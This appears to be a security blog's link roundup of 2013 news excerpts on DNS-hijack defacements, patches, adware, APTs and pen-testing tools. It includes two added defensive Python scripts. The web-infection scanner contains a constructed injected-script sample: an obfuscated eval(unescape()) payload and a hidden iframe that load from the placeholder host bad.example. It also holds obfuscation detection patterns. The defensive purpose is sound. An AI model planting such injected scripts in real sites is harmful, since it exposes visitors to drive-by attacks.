Facebook Pushes Passwords One Step Closer to Death | Wired Enterprise | Wired.com

October has always been John Flynn’s favorite time of year, but this year, it’s even better. He gets to spend the month trying to hack into a fleet of Facebook computers equipped with a new kind of security tool — a tool that takes computer security beyond the password.

Since jumping to Facebook from his job at Google a few years ago, Flynn has been part of the Facebook security team that masquerades as bad guys during the month of October, doing their best to bust into the corporate network that underpins the social networking giant. They call it “Hacktober,” and the idea is to find the holes where the real bad guys might attack the company. Last year, Flynn and other Facebook security engineers created a fake news story designed to spread a computer worm around the network.

Flynn — who goes by the nickname “Four” — won’t say what’s in store for Facebook’s employees this October, but one thing seems certain: Hacking them is going to be that much more of a challenge. Over the past year, the company has equipped many employee systems with Yubikeys, little pieces of hardware that let employees securely log into machines with the tap of a finger. This nifty tool can make it that much harder for hackers to bust into a corporate network and do whatever they want — even if the hacker manages to take command of an authorized network machine.

via Facebook Pushes Passwords One Step Closer to Death | Wired Enterprise | Wired.com.

Hackers target high profile domains – Securelist

Over the last few days, several high-profile domains have been defaced, including domains belonging to two prominent security companies. In addition to these, high-profile domains such as alexa.com, whatsapp.com and redtube.com were also defaced. From our quick analysis it does not seem that the actual web server was compromised; the most likely attack vector was that the DNS was hijacked.

When looking into this, there are some quite obvious traces but nothing that really confirms what the hackers did; or what kind of information they were able to obtain. When analyzing previous compromises and defaces it seems that there is a “new” trend within hacking groups and defacers to go for the DNS or domain registrars instead of compromising the actual webserver. When quickly analyzing the domain there were two indicators that stood out.

via Hackers target high profile domains – Securelist.

Read on for the details and the two interesting indicators.
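The post contrasts two hypotheses for a defacement, a compromised web server versus hijacked DNS or registrar control, and notes that the indicators for the latter are visible without touching the server. The script below is an added example, not code from Securelist or from this blog: it compares what resolvers currently return for a domain against a known-good snapshot and reports the markers a responder would look for. Every record in it is constructed (RFC 5737 documentation addresses, hypothetical hostnames and registrar name) so it runs offline; in practice the `observed` dict would be filled from live NS/A/MX lookups and WHOIS.

```python
"""Baseline comparison of a domain's DNS delegation and records.

Added example, not from the Securelist post. A hijack at the registrar
or DNS provider changes the NS delegation and/or the A record; a
compromised web server changes neither. All values are constructed.
"""
from ipaddress import ip_address, ip_network

# Known-good snapshot taken before the incident (constructed, hypothetical).
BASELINE = {
    "ns": {"ns1.example-dns.net", "ns2.example-dns.net"},
    "a": {"203.0.113.10"},
    "mx": {"mail.example.com"},
    "hosting_ranges": ["203.0.113.0/24"],  # hoster's netblock; IP rotation inside it is not flagged
    "registrar": "Example Registrar LLC",
}


def hijack_indicators(observed, baseline=BASELINE):
    """Return a list of indicator strings; an empty list means DNS looks unchanged."""
    findings = []

    # 1. Delegation: attackers who take over the registrar account point NS elsewhere.
    ns_now = set(observed.get("ns", ()))
    added, missing = ns_now - baseline["ns"], baseline["ns"] - ns_now
    if added or missing:
        findings.append(f"NS delegation changed: added={sorted(added)} missing={sorted(missing)}")

    # 2. A records: a defacement served from an IP outside the hoster's ranges.
    ranges = [ip_network(r) for r in baseline["hosting_ranges"]]
    for addr in sorted(observed.get("a", ())):
        if addr not in baseline["a"] and not any(ip_address(addr) in r for r in ranges):
            findings.append(f"A record {addr} points outside the known hosting ranges")

    # 3. MX: a redirected MX means mail (including password resets) can be intercepted.
    mx_added = set(observed.get("mx", ())) - baseline["mx"]
    if mx_added:
        findings.append(f"MX changed: {sorted(mx_added)} (mail for the domain may be intercepted)")

    # 4. TTL: freshly repointed records are often published with a very low TTL.
    ttl = observed.get("ttl")
    if ttl is not None and ttl < 300:
        findings.append(f"TTL {ttl}s is unusually low; records were likely repointed recently")

    # 5. Registrar: a changed registrar means the domain itself was transferred.
    if observed.get("registrar") not in (None, baseline["registrar"]):
        findings.append(f"registrar changed to {observed['registrar']!r} (domain transfer)")

    return findings


def classify_defacement(observed, baseline=BASELINE):
    """Separate the two hypotheses the post contrasts."""
    if hijack_indicators(observed, baseline):
        return "dns_or_registrar_hijack"
    return "webserver_compromise_likely"


# Constructed observations for the two scenarios (hypothetical values).
OBSERVED_HIJACKED = {
    "ns": {"ns1.attacker-dns.example", "ns2.attacker-dns.example"},
    "a": {"198.51.100.77"},
    "mx": {"mail.example.com"},
    "ttl": 60,
    "registrar": "Example Registrar LLC",
}
OBSERVED_CLEAN = {
    "ns": {"ns1.example-dns.net", "ns2.example-dns.net"},
    "a": {"203.0.113.10"},
    "mx": {"mail.example.com"},
    "ttl": 3600,
    "registrar": "Example Registrar LLC",
}

if __name__ == "__main__":
    for name, obs in (("hijacked", OBSERVED_HIJACKED), ("clean", OBSERVED_CLEAN)):
        print(name, "->", classify_defacement(obs))
        for line in hijack_indicators(obs):
            print("  -", line)
```

A clean result with a defaced page is itself informative: if delegation, A and MX all match the baseline, the attacker is on the server, and the server logs rather than the registrar account are where the investigation goes next.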

ISC Diary | Microsoft October 2013 Patch Tuesday

Overview of the October 2013 Microsoft patches and their status, via ISC Diary | Microsoft October 2013 Patch Tuesday.

Microsoft scores these as four critical and three important patches. The ISC’s scoring is more refined, so read the article for the breakdown grid. The big news is the fix for the IE vulnerabilities.

Ad Vulna: A Vulnaggressive (Vulnerable & Aggressive) Adware Threatening Millions | FireEye Blog

FireEye researchers have discovered a rapidly-growing class of mobile threats represented by a popular ad library affecting apps with over 200 million downloads in total. This ad library, anonymized as “Vulna,” is aggressive at collecting sensitive data and is able to perform dangerous operations such as downloading and running new components on demand. Vulna is also plagued with various classes of vulnerabilities that enable attackers to turn Vulna’s aggressive behaviors against users. We coined the term “vulnaggressive” to describe this class of vulnerable and aggressive characteristics. Most vulnaggressive libraries are proprietary and it is hard for app developers to know their underlying security issues. Legitimate apps using vulnaggressive libraries present serious threats for enterprise customers. FireEye has informed both Google and the vendor of Vulna about the security issues and they are actively addressing them.

Recently FireEye discovered a new mobile threat from a popular ad library that no other antivirus or security vendor has reported publicly before. Mobile ad libraries are third-party software included by host apps in order to display ads. Because this library’s functionality and vulnerabilities can be used to conduct large-scale attacks on millions of users, we refer to it anonymously by the code name “Vulna” rather than revealing its identity in this blog.

via Ad Vulna: A Vulnaggressive (Vulnerable & Aggressive) Adware Threatening Millions | FireEye Blog.

I’m just starting to read up on this. Does anyone know of reliable secondary sources?

Securing More Vulnerabilities By Patching Less — Dark Reading

As a penetration tester, Mauricio Velazco frequently looked for information on the latest attacks because corporate information systems were rarely patched against the exploitation of just-reported vulnerabilities.

When he moved over to the other side of the firewall, Velazco — now the head of threat intelligence and vulnerability management at The Blackstone Group, an investment firm — duly implemented a patching process for his company that attempted to keep up with its regulated responsibilities. It quickly became clear, however, that fixing vulnerabilities using the criticality of the bugs to prioritize patching kept the IT staff busy, but it did not make the company much safer.

Thinking back to his time as a penetration tester, Velazco realized that patching the vulnerabilities he chased as an attacker would be a much better use of his time. The strategy paid off: Compromises within the company fell, he says.

via Securing More Vulnerabilities By Patching Less — Dark Reading.

Hmm. This is, to me, a new take on patch management. It oddly falls in with a discussion I had almost two years ago, oddly in that my peers and I came up with the same concept for different but related reasons.

What do you think?

Tech Insight: Top 4 Problem Areas that Lead to Internal Data Breaches

External data breaches from groups like Anonymous and internal data leaks from insiders such as Edward Snowden have enterprises questioning and rethinking their security programs. Are they doing enough to protect their data? Are their security controls effective? Would they be able to respond appropriately to a data breach and contain it quickly?

Many of the questions, and much of the confusion, have to do with executives not understanding where their critical assets are and how they need to be protected. Their sense of security is skewed by the fact that they’ve passed their compliance requirements, causing them to think they are safe. For most companies, if they were truly targeted by a sophisticated and determined attacker, they would fail miserably.

Why would they fail? Traditionally, security was focused on protecting the perimeter. Based on my experience with penetration testing organizations from all different industries, companies are doing a great job of locking down their externally exposed assets, with the exception of Web servers. There are fewer devices exposed and even fewer ports open that could provide an avenue for attack.

via Tech Insight: Top 4 Problem Areas that Lead to Internal Data Breaches.

Read the article for the details, but the four problem areas are:

  1. Asset management and putting in place proper protection mechanisms for those assets
  2. Not knowing or understanding the “principle of least privilege” (I’d also add “default deny”) and “need to know”
  3. Security training and awareness
  4. Shared credentials and password reuse

In my opinion items 1, 2, and 4 tie into my preference for dealing with security’s “low hanging fruit”, the basic tenets we all should do 100% of the time. Security awareness and training has value, but I think there’s too much focus on it. That focus takes time, money, and effort away from those security tenets I mentioned before.


ISC Diary | Tools for reviewing infected websites

At the ISC we had a report today from Greg about obfuscated Javascript on the site hxxp://fishieldcorp.com/. A little research revealed that this site has been infected in the past. Nothing extraordinary, just another run of the mill website infection.

What did strike me is how the nature of this research has changed in recent years. Not so long ago checking out a potentially infected website would have involved VMs or goat machines and a lot of patience and trial and error. Today there are so many sites that will do the basics for you. Greg sent us a link to URLQuery which displays a lot of information about a website including the fact that this one is infected.

via ISC Diary | Tools for reviewing infected websites.
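The diary's point is that the first pass over a suspected infected page used to need a throwaway VM and now mostly needs a lookup. The script below is an added example, not from the ISC diary or from URLQuery: a static triage pass a responder can run offline on saved HTML before (or instead of) submitting the URL to such a service. It looks for the markers that typically give away injected content, such as `eval`/`unescape` wrappers, long runs of escaped bytes, `String.fromCharCode` chains, very long single tokens and 1x1 or hidden iframes. The two sample pages are constructed, and `bad.example` is a placeholder hostname, not a real indicator.

```python
"""Static triage of saved HTML for common website-infection markers.

Added example, not code from the ISC diary. The checks are heuristics
that point a responder at which script block to look at; they are not a
verdict. Sample pages below are constructed.
"""
import math
import re
from collections import Counter

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
# 0/1-pixel dimensions or CSS hiding on an iframe: the classic drive-by loader.
HIDDEN_RE = re.compile(
    r"(?:width|height)\s*[=:]\s*[\"']?\s*[01](?![0-9])|visibility\s*:\s*hidden|display\s*:\s*none",
    re.I,
)
EVAL_RE = re.compile(r"\beval\s*\(|\bunescape\s*\(|document\.write\s*\(", re.I)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(", re.I)
# 20+ consecutive \xNN or %NN escapes: a payload hidden from a casual read.
HEX_RUN_RE = re.compile(r"(?:\\x[0-9a-f]{2}){20,}|(?:%[0-9a-f]{2}){20,}", re.I)


def shannon_entropy(s):
    """Bits per character; packed or encrypted blobs sit well above plain JavaScript."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def scan_html(html):
    """Return {location: [marker, ...]}; an empty dict means no marker fired."""
    findings = {}
    for i, body in enumerate(SCRIPT_RE.findall(html)):
        hits = []
        if EVAL_RE.search(body):
            hits.append("eval/unescape/document.write")
        if FROMCHARCODE_RE.search(body):
            hits.append("String.fromCharCode")
        if HEX_RUN_RE.search(body):
            hits.append("long escaped-byte run")
        longest = max((len(tok) for tok in re.split(r"\s+", body)), default=0)
        if longest > 500:
            hits.append(f"single token of {longest} chars")
        ent = shannon_entropy(body.strip())
        if len(body) > 200 and ent > 5.0:
            hits.append(f"entropy {ent:.2f} bits/char")
        if hits:
            findings[f"script[{i}]"] = hits
    for m in IFRAME_RE.finditer(html):
        attrs = m.group(1).strip()
        if HIDDEN_RE.search(attrs):
            findings.setdefault("hidden_iframes", []).append(attrs)
    return findings


# Constructed samples. The "infected" page carries a %-escaped document.write
# wrapped in eval(unescape(...)) plus a 1x1 hidden iframe; bad.example is a placeholder.
BENIGN_HTML = (
    "<html><head><script>function hi(){ console.log(\"hello\"); }</script></head>"
    "<body><p>Welcome</p><iframe src=\"/video\" width=\"640\" height=\"360\"></iframe></body></html>"
)
_ESCAPED = "".join(
    "%%%02x" % ord(c)
    for c in "document.write('<iframe src=\"http://bad.example/x.php\"></iframe>')"
)
INFECTED_HTML = (
    "<html><body><p>Welcome</p>"
    "<script>eval(unescape(\"" + _ESCAPED + "\"));</script>"
    "<iframe src=\"http://bad.example/in.php\" width=\"1\" height=\"1\" "
    "style=\"visibility:hidden\"></iframe>"
    "</body></html>"
)

if __name__ == "__main__":
    for name, page in (("benign", BENIGN_HTML), ("infected", INFECTED_HTML)):
        print(name, scan_html(page))
```

Run against a saved copy of the page rather than the live URL so the scan does not itself fetch the injected content; the next step for any block that fires is to decode it (here, `unescape` the %-string) and see what it loads.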

Cisco launches open-source tool for penetration testers | ZDNet

Cisco has opened up access to Kvasir, which helps penetration testers worldwide assess the security levels of computer systems at a glance.

In a blog post, Kurt Grutzmacher, solutions architect at Cisco’s Security Practice Advanced Services team, said that the tool was initially created for the Cisco Systems Advanced Services Security Posture Assessment (SPA) team to keep track of the tests and data collected by the firm’s penetration testers.

A pen test is a way to test a system’s security standard by simulating a cyberattack.

During typical assessments of network security, pen testers may analyze between 2,000 and 10,000 hosts for vulnerabilities, perform various exploitation methods such as account enumeration and password attempts, and then they have to collect, sift through and document the results.

via Cisco launches open-source tool for penetration testers | ZDNet.

Now You See Me – H-worm by Houdini | FireEye Blog

H-worm is a VBS (Visual Basic Script) based RAT written by an individual going by the name Houdini. We believe the author is based in Algeria and has connections to njq8, the author of njw0rm [1] and njRAT/LV [2] through means of a shared or common code base. We have seen the H-worm RAT being employed in targeted attacks against the international energy industry; however, we also see it being employed in a wider context as run of the mill attacks through spammed email attachments and malicious links.

via Now You See Me – H-worm by Houdini | FireEye Blog.

The Icefog APT: A Tale of Cloak and Three Daggers – Securelist

The world of Advanced Persistent Threats (APTs) is well known. Skilled adversaries compromising high-profile victims and stealthily exfiltrating valuable data over the course of many years. Such teams sometimes count tens or even hundreds of people, going through terabytes or even petabytes of exfiltrated data.

Although there has been an increasing focus on attribution and pinpointing the sources of these attacks, not much is known about a new emerging trend: the smaller hit-and-run gangs that are going after the supply chain and compromising targets with surgical precision.

Since 2011 we have been tracking a series of attacks that we link to a threat actor called ‘Icefog’. We believe this is a relatively small group of attackers that are going after the supply chain — targeting government institutions, military contractors, maritime and ship-building groups, telecom operators, satellite operators, industrial and high technology companies and mass media, mainly in South Korea and Japan. The Icefog campaigns rely on custom-made cyber-espionage tools for Microsoft Windows and Apple Mac OS X. The attackers directly control the infected machines during the attacks; in addition to Icefog, we noticed them using other malicious tools and backdoors for lateral movement and data exfiltration.

via The Icefog APT: A Tale of Cloak and Three Daggers – Securelist.
